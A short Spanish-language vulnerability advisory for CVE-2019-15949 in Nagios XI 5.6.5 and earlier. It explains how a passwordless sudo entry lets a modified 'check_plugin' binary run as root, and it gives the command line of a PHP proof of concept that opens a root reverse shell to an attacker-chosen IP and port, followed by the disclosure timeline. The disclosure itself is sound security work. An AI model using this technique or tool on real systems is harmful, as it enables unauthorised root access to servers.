
PoC que explota una vulnerabilidad en Nagios XI (5.6.5) para obtener una shell root
Existe una vulnerabilidad en Nagios XI <= 5.6.5 que permite a un atacante aprovechar un RCE para escalar privilegios a root.
El exploit requiere acceso al servidor como el usuario 'nagios', o acceso CCM a través de la interfaz web con permisos para administrar plugins.
El script getprofile.sh, invocado al descargar un perfil del sistema (profile.php?cmd=download), se ejecuta como root mediante una entrada sudo sin contraseña; el script ejecuta el ejecutable ‘check_plugin’ que pertenece al usuario nagios.
Un usuario con sesión iniciada en Nagios XI con permisos para modificar plugins, o el usuario 'nagios' en el servidor, puede modificar el ejecutable ‘check_plugin’ e insertar comandos maliciosos ejecutables como root.
Se ha desarrollado un POC en PHP que sube un payload que resulta en una reverse shell como root.
Uso:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
Reportado a Nagios el: 29 de julio de 2019
Confirmado por Nagios el: 29 de julio de 2019
Corregido en la versión: 5.6.6 el: 20 de agosto de 2019
CVE asignado el: 6 de septiembre de 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)
